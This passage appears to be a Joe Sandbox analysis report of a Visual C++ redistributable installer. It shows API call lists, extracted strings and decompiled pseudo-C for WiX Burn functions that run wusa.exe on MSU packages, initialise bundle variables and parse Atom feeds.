                                                                          0x00036e55
                                                                          0x00036e58
                                                                          0x00000000
                                                                          0x00036da6
                                                                          0x00036db5
                                                                          0x00036e25
                                                                          0x00036e2a
                                                                          0x00036e2d
                                                                          0x00036e2f
                                                                          0x00036e51
                                                                          0x00036e51
                                                                          0x00036e31
                                                                          0x00036e31
                                                                          0x00036e34
                                                                          0x00000000
                                                                          0x00036e36
                                                                          0x00036e36
                                                                          0x00036e3b
                                                                          0x00036e4b
                                                                          0x00036e4b
                                                                          0x00000000
                                                                          0x00036e3d
                                                                          0x00036e3d
                                                                          0x00036e42
                                                                          0x00000000
                                                                          0x00036e44
                                                                          0x00036e47
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00036e49
                                                                          0x00036e47
                                                                          0x00036e42
                                                                          0x00036e3b
                                                                          0x00036e34
                                                                          0x00036db7
                                                                          0x00036db7
                                                                          0x00036dc8
                                                                          0x00036dd2
                                                                          0x00036de0
                                                                          0x00036de5
                                                                          0x00000000
                                                                          0x00036de5
                                                                          0x00036db5
                                                                          0x00036da0
                                                                          0x00000000
                                                                          0x00036d9c
                                                                          0x00036df7
                                                                          0x00036e08
                                                                          0x00036e0d
                                                                          0x00000000
                                                                          0x00036d22
                                                                          0x00036d22
                                                                          0x00036d33
                                                                          0x00036d3d
                                                                          0x00036d4b
                                                                          0x00036d50
                                                                          0x00036d53
                                                                          0x00000000
                                                                          0x00036d53
                                                                          0x00036ce7
                                                                          0x00036ce7
                                                                          0x00000000
                                                                          0x00036ce7
                                                                          0x00036c53
                                                                          0x00036c53
                                                                          0x00036c58
                                                                          0x00000000
                                                                          0x00036c5a
                                                                          0x00036c69
                                                                          0x00036c6d
                                                                          0x00036c87
                                                                          0x00036c8b
                                                                          0x00000000
                                                                          0x00036c8d
                                                                          0x00036c8d
                                                                          0x00000000
                                                                          0x00036c8d
                                                                          0x00036c6f
                                                                          0x00036c6f
                                                                          0x00000000
                                                                          0x00036c6f
                                                                          0x00036c6d
                                                                          0x00036c58
                                                                          0x00036c15
                                                                          0x00036c15
                                                                          0x00000000
                                                                          0x00036c15
                                                                          0x00036bee
                                                                          0x00036bee
                                                                          0x00000000
                                                                          0x00036bee
                                                                          0x00036bb0
                                                                          0x00036bb3
                                                                          0x00036bb5
                                                                          0x00036e5d
                                                                          0x00036e5d
                                                                          0x00036e5e
                                                                          0x00036e63
                                                                          0x00036b8a
                                                                          0x00036b8a
                                                                          0x00036b8f
                                                                          0x00000000
                                                                          0x00036b8f
                                                                          0x00036b88
                                                                          0x00036b6c
                                                                          0x00036b6c
                                                                          0x00000000
                                                                          0x00036b6c
                                                                          0x00036b36
                                                                          0x00036b36
                                                                          0x00000000
                                                                          0x00036b36
                                                                          0x00036b18
                                                                          0x00036b18
                                                                          0x00000000
                                                                          0x00036b18
                                                                          0x00036b16
                                                                          0x00036aeb
                                                                          0x00036aeb
                                                                          0x00036af0
                                                                          0x00036af0
                                                                          0x00036af1
                                                                          0x00036af7
                                                                          0x00036e66
                                                                          0x00036e6a
                                                                          0x00036e6f
                                                                          0x00036e6f
                                                                          0x00036e78
                                                                          0x00036e7d
                                                                          0x00036e7d
                                                                          0x00036e86
                                                                          0x00036e8b
                                                                          0x00036e8b
                                                                          0x00036e94
                                                                          0x00036e99
                                                                          0x00036e99
                                                                          0x00036ea2
                                                                          0x00036ea7
                                                                          0x00036ea7
                                                                          0x00036eb0
                                                                          0x00036eb5
                                                                          0x00036eb5
                                                                          0x00036ec4
                                                                          0x00036ed2
                                                                          0x00036ec6
                                                                          0x00036ec9
                                                                          0x00036ecb
                                                                          0x00036ecd
                                                                          0x00036ecd
                                                                          0x00036ed8
                                                                          0x00036edd
                                                                          0x00036edf
                                                                          0x00036edf
                                                                          0x00036ee6
                                                                          0x00036eed
                                                                          0x00036eed
                                                                          0x00036efd
                                                                          0x00036f0a

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,0002BBCA,00000007,?,?,?), ref: 00036AD9
                                                                            • Part of subcall function 000509BB: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00015D8F,00000000), ref: 000509CF
                                                                            • Part of subcall function 000509BB: GetProcAddress.KERNEL32(00000000), ref: 000509D6
                                                                            • Part of subcall function 000509BB: GetLastError.KERNEL32(?,?,?,00015D8F,00000000), ref: 000509ED
                                                                          • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 00036EC9
                                                                          • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 00036EDD
                                                                          Strings
                                                                          • Failed to get cached path for package: %ls, xrefs: 00036BB5
                                                                          • Failed to allocate WUSA.exe path., xrefs: 00036B6C
                                                                          • "%ls" "%ls" /quiet /norestart, xrefs: 00036C01
                                                                          • Failed to find System32 directory., xrefs: 00036B4E
                                                                          • Failed to ensure WU service was enabled to install MSU package., xrefs: 00036CE7
                                                                          • SysNative\, xrefs: 00036B23
                                                                          • 2, xrefs: 00036D6C
                                                                          • Bootstrapper application aborted during MSU progress., xrefs: 00036E0D
                                                                          • Failed to find Windows directory., xrefs: 00036B18
                                                                          • msuuser.cpp, xrefs: 00036D46, 00036DDB, 00036E03
                                                                          • Failed to get action arguments for MSU package., xrefs: 00036B8F
                                                                          • /log:, xrefs: 00036C5B
                                                                          • Failed to append log switch to MSU command-line., xrefs: 00036C6F
                                                                          • wusa.exe, xrefs: 00036B59
                                                                          • Failed to build MSU path., xrefs: 00036BEE
                                                                          • D, xrefs: 00036CF4
                                                                          • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 00036C2E
                                                                          • Failed to determine WOW64 status., xrefs: 00036AEB
                                                                          • WixBundleExecutePackageCacheFolder, xrefs: 00036BC4, 00036EF5
                                                                          • Failed to get process exit code., xrefs: 00036DE5
                                                                          • Failed to append SysNative directory., xrefs: 00036B36
                                                                          • Failed to format MSU uninstall command., xrefs: 00036C42
                                                                          • Failed to CreateProcess on path: %ls, xrefs: 00036D53
                                                                          • Failed to wait for executable to complete: %ls, xrefs: 00036E58
                                                                          • @Met, xrefs: 00036D22, 00036DB7
                                                                          • Failed to format MSU install command., xrefs: 00036C15
                                                                          • Failed to append log path to MSU command-line., xrefs: 00036C8D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                          • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$@Met$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuuser.cpp$wusa.exe
                                                                          • API String ID: 1400713077-1568090568
                                                                          • Opcode ID: 6b1fd490d6fa6f19eeada7f9a4fcbbaa4252df738ac186ad342c7c479f865b41
                                                                          • Instruction ID: f611b172fb661f3737b6df55ce05cadb3de4e9d6d8b0c2c1513b61c0a37c0ecb
                                                                          • Opcode Fuzzy Hash: 6b1fd490d6fa6f19eeada7f9a4fcbbaa4252df738ac186ad342c7c479f865b41
                                                                          • Instruction Fuzzy Hash: BAD1B275B0070ABFDB129FE5CC85EEEBBBDAF04704F108026F601A6162D7B69E449B51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001834D Relevance: 59.8, APIs: 5, Strings: 29, Instructions: 331COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 72%
                                                                          			E0001834D(struct _CRITICAL_SECTION* _a4, intOrPtr _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				void* _v24;
				int _v28;
				char _v32;
				char _v36;
				void _v60;
				intOrPtr* _t97;
				int _t148;
				struct _CRITICAL_SECTION* _t154;
				signed int _t155;
				intOrPtr* _t158;
				signed int _t159;
				int _t169;
				signed int _t170;
				void* _t171;
				signed int _t172;
				struct _CRITICAL_SECTION* _t174;
				void* _t176;
				int _t177;
				void* _t179;
				void* _t180;

				_t154 = _a4;
				_t155 = 6;
				_v24 = 0;
				_v16 = 0;
				memset( &_v60, 0, _t155 << 2);
				_t180 = _t179 + 0xc;
				_v32 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v36 = 0;
				_v28 = 0;
				EnterCriticalSection(_t154);
				if(E00053803(_a8, L"Variable",  &_v24) >= 0) {
					_t97 = _v24;
					_t166 =  &_v32;
					_t157 =  *_t97;
					_t176 =  *((intOrPtr*)( *_t97 + 0x20))(_t97,  &_v32);
					if(_t176 >= 0) {
						_t169 = 0;
						_a4 = 0;
						if(_v32 > 0) {
							while(1) {
								_t176 = E00053760(_t157, _v24,  &_v16, _t169);
								if(_t176 < 0) {
									break;
								}
								_t176 = E000531C7(_v16, L"Id",  &_v8);
								if(_t176 < 0) {
									_push("Failed to get @Id.");
									goto L57;
								} else {
									_t176 = E000533DB(_t157, _v16, L"Hidden",  &_v20);
									if(_t176 < 0) {
										_push("Failed to get @Hidden.");
										goto L57;
									} else {
										_t176 = E000533DB(_t157, _v16, L"Persisted",  &_v36);
										if(_t176 < 0) {
											_push("Failed to get @Persisted.");
											goto L57;
										} else {
											_t176 = E000531C7(_v16, L"Value",  &_v12);
											if(_t176 == 0x80070490) {
												_t177 = _t169;
												goto L25;
											} else {
												if(_t176 < 0) {
													_push("Failed to get @Value.");
													goto L57;
												} else {
													_t176 = E000302F4( &_v60, _v12, _t169);
													if(_t176 < 0) {
														_push("Failed to set variant value.");
														goto L57;
													} else {
														_t176 = E000531C7(_v16, L"Type",  &_v12);
														if(_t176 < 0) {
															_push("Failed to get @Type.");
															goto L57;
														} else {
															_t148 = CompareStringW(0x7f, _t169, _v12, 0xffffffff, L"numeric", 0xffffffff);
															_t177 = 2;
															if(_t148 != _t177) {
																if(CompareStringW(0x7f, _t169, _v12, 0xffffffff, L"string", 0xffffffff) != _t177) {
																	if(CompareStringW(0x7f, _t169, _v12, 0xffffffff, L"version", 0xffffffff) != _t177) {
																		_push(_v12);
																		_t171 = 0x80070057;
																		_t176 = 0x80070057;
																		_push("Invalid value for @Type: %ls");
																		goto L42;
																	} else {
																		if(_v20 == 0) {
																			_push(_v60);
																			E0005061A(_t177, "Initializing version variable \'%ls\' to value \'%ls\'", _v8);
																			_t180 = _t180 + 0x10;
																		}
																		_t177 = 3;
																		goto L25;
																	}
																} else {
																	if(_v20 != 0) {
																		goto L26;
																	} else {
																		_push(_v60);
																		E0005061A(_t177, "Initializing string variable \'%ls\' to value \'%ls\'", _v8);
																		_t180 = _t180 + 0x10;
																		goto L25;
																	}
																	goto L27;
																}
															} else {
																if(_v20 == 0) {
																	_push(_v60);
																	E0005061A(_t177, "Initializing numeric variable \'%ls\' to value \'%ls\'", _v8);
																	_t180 = _t180 + 0x10;
																}
																_t177 = 1;
																L25:
																if(_v20 != 0) {
																	L26:
																	E0005061A(2, "Initializing hidden variable \'%ls\'", _v8);
																	_t180 = _t180 + 0xc;
																}
																L27:
																_t176 = E0002FEB7(_t166,  &_v60, _t177);
																if(_t176 < 0) {
																	_push("Failed to change variant type.");
																	goto L57;
																} else {
																	_t176 = E000155B6(_t157, _t154, _v8,  &_v28);
																	if(_t176 < 0) {
																		_push(_v8);
																		_push("Failed to find variable value \'%ls\'.");
																		goto L51;
																	} else {
																		_t170 = _v28;
																		if(_t176 != 1) {
																			_t53 = _t154 + 0x20; // 0x85f08bff
																			_t124 =  *_t53;
																			if( *((intOrPtr*)(_t170 * 0x38 +  *_t53 + 0x2c)) > 0) {
																				_t171 = 0x80070057;
																				_t176 = 0x80070057;
																				E000137D3(_t124, "variable.cpp", 0x18a, 0x80070057);
																				_push(_v8);
																				_push("Attempt to set built-in variable value: %ls");
																				L42:
																				_push(_t171);
																				goto L43;
																			} else {
																				goto L33;
																			}
																		} else {
																			_t176 = E00016AC6(_t122, _t157, _t154, _v8, _t170);
																			if(_t176 >= 0) {
																				L33:
																				_t56 = _t154 + 0x20; // 0x85f08bff
																				_t172 = _t170 * 0x38;
																				 *((intOrPtr*)(_t172 +  *_t56 + 0x20)) = _v20;
																				_t60 = _t154 + 0x20; // 0x85f08bff
																				 *((intOrPtr*)(_t172 +  *_t60 + 0x28)) = _v36;
																				_t65 = _t154 + 0x20; // 0x85f08bff
																				_t176 = E0003035B(_t166,  *_t65 + 8 + _t172,  &_v60);
																				if(_t176 < 0) {
																					_push(_v8);
																					_push("Failed to set value of variable: %ls");
																					goto L51;
																				} else {
																					_t66 = _t154 + 0x20; // 0x85f08bff
																					_t176 = E00030246( *_t66 + 8 + _t172, _v20);
																					if(_t176 < 0) {
																						_push("Failed to set variant encryption");
																						goto L57;
																					} else {
																						_t157 = _v16;
																						if(_t157 != 0) {
																							 *((intOrPtr*)( *_t157 + 8))(_t157);
																							_v16 = _v16 & 0x00000000;
																						}
																						E00030499( &_v60);
																						if(_v12 != 0) {
																							E00012793(_v12);
																							_v12 = _v12 & 0x00000000;
																						}
																						_t174 = _a4 + 1;
																						_a4 = _t174;
																						if(_t174 < _v32) {
																							_t169 = 0;
																							continue;
																						}
																					}
																				}
																			} else {
																				_push(_v8);
																				_push("Failed to insert variable \'%ls\'.");
																				L51:
																				_push(_t176);
																				L43:
																				E0005012F();
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
								goto L58;
							}
							_push("Failed to get next node.");
							goto L57;
						}
					} else {
						_push("Failed to get variable node count.");
						goto L57;
					}
				} else {
					_push("Failed to select variable nodes.");
					L57:
					_push(_t176);
					E0005012F();
				}
				L58:
				LeaveCriticalSection(_t154);
				_t158 = _v24;
				if(_t158 != 0) {
					 *((intOrPtr*)( *_t158 + 8))(_t158);
				}
				_t159 = _v16;
				if(_t159 != 0) {
					 *((intOrPtr*)( *_t159 + 8))(_t159);
				}
				if(_v12 != 0) {
					E000554EF(_v12);
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				E00030499( &_v60);
				return _t176;
			}



























                                                                          0x00018354
                                                                          0x0001835d
                                                                          0x00018360
                                                                          0x00018366
                                                                          0x00018369
                                                                          0x00018369
                                                                          0x0001836c
                                                                          0x0001836f
                                                                          0x00018372
                                                                          0x00018375
                                                                          0x00018378
                                                                          0x0001837b
                                                                          0x0001837e
                                                                          0x00018399
                                                                          0x000183a5
                                                                          0x000183a8
                                                                          0x000183ad
                                                                          0x000183b2
                                                                          0x000183b6
                                                                          0x000183c2
                                                                          0x000183c4
                                                                          0x000183ca
                                                                          0x000183d0
                                                                          0x000183dd
                                                                          0x000183e1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000183f8
                                                                          0x000183fc
                                                                          0x000186c6
                                                                          0x00000000
                                                                          0x00018402
                                                                          0x00018413
                                                                          0x00018417
                                                                          0x000186bf
                                                                          0x00000000
                                                                          0x0001841d
                                                                          0x0001842e
                                                                          0x00018432
                                                                          0x000186b8
                                                                          0x00000000
                                                                          0x00018438
                                                                          0x00018449
                                                                          0x00018451
                                                                          0x0001853d
                                                                          0x00000000
                                                                          0x00018457
                                                                          0x00018459
                                                                          0x0001866d
                                                                          0x00000000
                                                                          0x0001845f
                                                                          0x0001846c
                                                                          0x00018470
                                                                          0x00018666
                                                                          0x00000000
                                                                          0x00018476
                                                                          0x00018487
                                                                          0x0001848b
                                                                          0x0001865f
                                                                          0x00000000
                                                                          0x00018491
                                                                          0x000184a0
                                                                          0x000184a8
                                                                          0x000184ab
                                                                          0x000184e3
                                                                          0x00018518
                                                                          0x00018645
                                                                          0x00018648
                                                                          0x0001864d
                                                                          0x0001864f
                                                                          0x00000000
                                                                          0x0001851e
                                                                          0x00018522
                                                                          0x00018524
                                                                          0x00018530
                                                                          0x00018535
                                                                          0x00018535
                                                                          0x0001853a
                                                                          0x00000000
                                                                          0x0001853a
                                                                          0x000184e5
                                                                          0x000184e9
                                                                          0x00000000
                                                                          0x000184eb
                                                                          0x000184eb
                                                                          0x000184f7
                                                                          0x000184fc
                                                                          0x00000000
                                                                          0x000184fc
                                                                          0x00000000
                                                                          0x000184e9
                                                                          0x000184ad
                                                                          0x000184b1
                                                                          0x000184b3
                                                                          0x000184bf
                                                                          0x000184c4
                                                                          0x000184c4
                                                                          0x000184c9
                                                                          0x0001853f
                                                                          0x00018543
                                                                          0x00018545
                                                                          0x0001854f
                                                                          0x00018554
                                                                          0x00018554
                                                                          0x00018557
                                                                          0x00018561
                                                                          0x00018565
                                                                          0x000186b1
                                                                          0x00000000
                                                                          0x0001856b
                                                                          0x00018578
                                                                          0x0001857c
                                                                          0x000186a6
                                                                          0x000186a9
                                                                          0x00000000
                                                                          0x00018582
                                                                          0x00018582
                                                                          0x00018588
                                                                          0x000185a7
                                                                          0x000185a7
                                                                          0x000185b2
                                                                          0x00018685
                                                                          0x00018695
                                                                          0x00018697
                                                                          0x0001869c
                                                                          0x0001869f
                                                                          0x00018654
                                                                          0x00018654
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001858a
                                                                          0x00018594
                                                                          0x00018598
                                                                          0x000185b8
                                                                          0x000185b8
                                                                          0x000185be
                                                                          0x000185c1
                                                                          0x000185c5
                                                                          0x000185cb
                                                                          0x000185d3
                                                                          0x000185e1
                                                                          0x000185e5
                                                                          0x0001867b
                                                                          0x0001867e
                                                                          0x00000000
                                                                          0x000185eb
                                                                          0x000185eb
                                                                          0x000185fc
                                                                          0x00018600
                                                                          0x00018674
                                                                          0x00000000
                                                                          0x00018602
                                                                          0x00018602
                                                                          0x00018607
                                                                          0x0001860c
                                                                          0x0001860f
                                                                          0x0001860f
                                                                          0x00018617
                                                                          0x00018620
                                                                          0x00018625
                                                                          0x0001862a
                                                                          0x0001862a
                                                                          0x00018631
                                                                          0x00018632
                                                                          0x00018638
                                                                          0x0001863e
                                                                          0x00000000
                                                                          0x0001863e
                                                                          0x00018638
                                                                          0x00018600
                                                                          0x0001859a
                                                                          0x0001859a
                                                                          0x0001859d
                                                                          0x000186ae
                                                                          0x000186ae
                                                                          0x00018655
                                                                          0x00018655
                                                                          0x0001865a
                                                                          0x00018598
                                                                          0x00018588
                                                                          0x0001857c
                                                                          0x00018565
                                                                          0x000184ab
                                                                          0x0001848b
                                                                          0x00018470
                                                                          0x00018459
                                                                          0x00018451
                                                                          0x00018432
                                                                          0x00018417
                                                                          0x00000000
                                                                          0x000183fc
                                                                          0x000186cd
                                                                          0x00000000
                                                                          0x000186cd
                                                                          0x000183b8
                                                                          0x000183b8
                                                                          0x00000000
                                                                          0x000183b8
                                                                          0x0001839b
                                                                          0x0001839b
                                                                          0x000186d2
                                                                          0x000186d2
                                                                          0x000186d3
                                                                          0x000186d9
                                                                          0x000186da
                                                                          0x000186db
                                                                          0x000186e1
                                                                          0x000186e6
                                                                          0x000186eb
                                                                          0x000186eb
                                                                          0x000186ee
                                                                          0x000186f3
                                                                          0x000186f8
                                                                          0x000186f8
                                                                          0x000186ff
                                                                          0x00018704
                                                                          0x00018704
                                                                          0x0001870d
                                                                          0x00018712
                                                                          0x00018712
                                                                          0x0001871b
                                                                          0x00018728

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(0001533D,?,00000000,80070490,?,?,?,?,?,?,?,?,0003BF87,?,0001533D,?), ref: 0001837E
                                                                          • LeaveCriticalSection.KERNEL32(0001533D,?,?,?,?,?,?,?,?,0003BF87,?,0001533D,?,0001533D,0001533D,Chain), ref: 000186DB
                                                                          Strings
                                                                          • string, xrefs: 000184CE
                                                                          • Type, xrefs: 0001847A
                                                                          • version, xrefs: 00018503
                                                                          • Failed to set variant encryption, xrefs: 00018674
                                                                          • numeric, xrefs: 00018493
                                                                          • Hidden, xrefs: 00018406
                                                                          • Initializing version variable '%ls' to value '%ls', xrefs: 0001852A
                                                                          • Failed to select variable nodes., xrefs: 0001839B
                                                                          • Initializing hidden variable '%ls', xrefs: 00018548
                                                                          • Attempt to set built-in variable value: %ls, xrefs: 0001869F
                                                                          • Value, xrefs: 0001843C
                                                                          • Invalid value for @Type: %ls, xrefs: 0001864F
                                                                          • variable.cpp, xrefs: 00018690
                                                                          • Failed to set variant value., xrefs: 00018666
                                                                          • Variable, xrefs: 00018388
                                                                          • Failed to get next node., xrefs: 000186CD
                                                                          • Initializing string variable '%ls' to value '%ls', xrefs: 000184F1
                                                                          • Failed to insert variable '%ls'., xrefs: 0001859D
                                                                          • Initializing numeric variable '%ls' to value '%ls', xrefs: 000184B9
                                                                          • Persisted, xrefs: 00018421
                                                                          • Failed to change variant type., xrefs: 000186B1
                                                                          • Failed to get variable node count., xrefs: 000183B8
                                                                          • Failed to get @Value., xrefs: 0001866D
                                                                          • Failed to get @Type., xrefs: 0001865F
                                                                          • Failed to get @Id., xrefs: 000186C6
                                                                          • Failed to find variable value '%ls'., xrefs: 000186A9
                                                                          • Failed to set value of variable: %ls, xrefs: 0001867E
                                                                          • Failed to get @Persisted., xrefs: 000186B8
                                                                          • Failed to get @Hidden., xrefs: 000186BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
                                                                          • API String ID: 3168844106-1614826165
                                                                          • Opcode ID: 3969c0dcd2ecbd05b57f944c15c9537e7422ba8fab947b50ebaa9615cf0c59b7
                                                                          • Instruction ID: 1df50d8a2f1893f4367606f683796b352bcfc65613425a88537026d2111b0b40
                                                                          • Opcode Fuzzy Hash: 3969c0dcd2ecbd05b57f944c15c9537e7422ba8fab947b50ebaa9615cf0c59b7
                                                                          • Instruction Fuzzy Hash: 66B1D172D00619BFDB219B94CC45EEFBBB9AF44752F108255F910BA291CB719F84CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000572F4 Relevance: 45.8, APIs: 13, Strings: 13, Instructions: 340COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 83%
                                                                          			E000572F4(void* __ebx, void* __eflags, int _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				int _v20;
				int _v24;
				int _v28;
				void* __edi;
				int _t110;
				int _t111;
				int _t112;
				int _t114;
				int _t116;
				int _t117;
				int _t118;
				int _t119;
				int _t120;
				int _t121;
				int _t122;
				int _t123;
				int _t124;
				int _t125;
				int _t128;
				void* _t147;
				intOrPtr* _t150;
				void* _t151;
				signed int _t153;
				intOrPtr* _t154;
				intOrPtr _t160;
				int _t161;

				_t149 = __ebx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t160 = E000138D4(0x48, 1);
				if(_t160 != 0) {
					_t150 = _a4;
					 *((intOrPtr*)(_t160 + 0x40)) = _t150;
					 *((intOrPtr*)( *_t150 + 4))(_t150, __ebx);
					_t7 = _t160 + 0x20; // 0x20
					_t8 = _t160 + 0x24; // 0x24
					_t161 = E000564F4(_t8, _t150, L"author", _t8, _t7);
					__eflags = _t161;
					if(_t161 >= 0) {
						_t9 = _t160 + 0x28; // 0x28
						_t10 = _t160 + 0x2c; // 0x2c
						_t161 = E0005658C(_t10, _t150, L"category", _t10, _t9);
						__eflags = _t161;
						if(_t161 >= 0) {
							_t11 = _t160 + 0x30; // 0x30
							_t12 = _t160 + 0x34; // 0x34
							_t161 = E00056624(_t12, _t150, L"entry", _t12, _t11);
							__eflags = _t161;
							if(_t161 >= 0) {
								_t13 = _t160 + 0x38; // 0x38
								_t14 = _t160 + 0x3c; // 0x3c
								_t161 = E000566BC(_t14, _t150, L"link", _t14, _t13);
								__eflags = _t161;
								if(_t161 >= 0) {
									_t158 =  &_v16;
									_t161 =  *((intOrPtr*)( *_t150 + 0x30))(_t150,  &_v16);
									__eflags = _t161;
									if(_t161 >= 0) {
										_t110 = E00053760( &_v16, _v16,  &_v12,  &_v8);
										_t161 = _t110;
										__eflags = _t161;
										if(_t161 != 0) {
											L45:
											_t111 =  *(_t160 + 8);
											__eflags = _t111;
											if(_t111 == 0) {
												L54:
												_t112 = 0x8007000d;
												_push(0x8007000d);
												_push(0x197);
												goto L55;
											} else {
												__eflags =  *_t111;
												if( *_t111 == 0) {
													goto L54;
												} else {
													_t114 =  *(_t160 + 0x14);
													__eflags = _t114;
													if(_t114 == 0) {
														L53:
														_t112 = 0x8007000d;
														_push(0x8007000d);
														_push(0x19c);
														goto L55;
													} else {
														__eflags =  *_t114;
														if( *_t114 == 0) {
															goto L53;
														} else {
															__eflags =  *(_t160 + 0x1c);
															if( *(_t160 + 0x1c) != 0) {
																L52:
																 *_a8 = _t160;
																_t160 = 0;
															} else {
																__eflags =  *(_t160 + 0x18);
																if( *(_t160 + 0x18) != 0) {
																	goto L52;
																} else {
																	_t112 = 0x8007000d;
																	_push(0x8007000d);
																	_push(0x1a1);
																	L55:
																	_push("atomutil.cpp");
																	_t161 = _t112;
																	E000137D3(_t112);
																}
															}
														}
													}
												}
											}
										} else {
											_t151 = CompareStringW;
											_v28 = _t161;
											_v24 = _t110;
											_v20 = _t110;
											_a4 = _t110;
											while(1) {
												_t116 = CompareStringW(0x7f, _t110, _v8, 0xffffffff, L"generator", 0xffffffff);
												__eflags = _t116 - 2;
												if(_t116 != 2) {
													goto L13;
												}
												_push(_v12);
												_push(_t160);
												L12:
												_t128 = E000567C4(_t158);
												L39:
												_t161 = _t128;
												__eflags = _t161;
												if(_t161 >= 0) {
													L40:
													__eflags = _v8;
													if(_v8 != 0) {
														__imp__#6(_v8);
														_t68 =  &_v8;
														 *_t68 = _v8 & 0x00000000;
														__eflags =  *_t68;
													}
													_t158 = _v12;
													__eflags = _t158;
													if(_t158 != 0) {
														 *((intOrPtr*)( *_t158 + 8))(_t158);
														_t72 =  &_v12;
														 *_t72 = _v12 & 0x00000000;
														__eflags =  *_t72;
													}
													_t161 = E00053760(_t158, _v16,  &_v12,  &_v8);
													__eflags = _t161;
													if(_t161 == 0) {
														_t161 = _v28;
														_t110 = 0;
														__eflags = 0;
														continue;
													} else {
														goto L45;
													}
												}
												goto L56;
												L13:
												_t117 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"icon", 0xffffffff);
												__eflags = _t117 - 2;
												if(_t117 != 2) {
													_t118 = CompareStringW(0x7f, 0, _v8, 0xffffffff, 0x73c78, 0xffffffff);
													__eflags = _t118 - 2;
													if(_t118 != 2) {
														_t119 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"logo", 0xffffffff);
														__eflags = _t119 - 2;
														if(_t119 != 2) {
															_t120 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"subtitle", 0xffffffff);
															__eflags = _t120 - 2;
															if(_t120 != 2) {
																_t121 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"title", 0xffffffff);
																__eflags = _t121 - 2;
																if(_t121 != 2) {
																	_t122 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"updated", 0xffffffff);
																	__eflags = _t122 - 2;
																	if(_t122 != 2) {
																		_t123 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"author", 0xffffffff);
																		__eflags = _t123 - 2;
																		if(_t123 != 2) {
																			_t124 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"category", 0xffffffff);
																			__eflags = _t124 - 2;
																			if(_t124 != 2) {
																				_t125 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"entry", 0xffffffff);
																				__eflags = _t125 - 2;
																				if(_t125 != 2) {
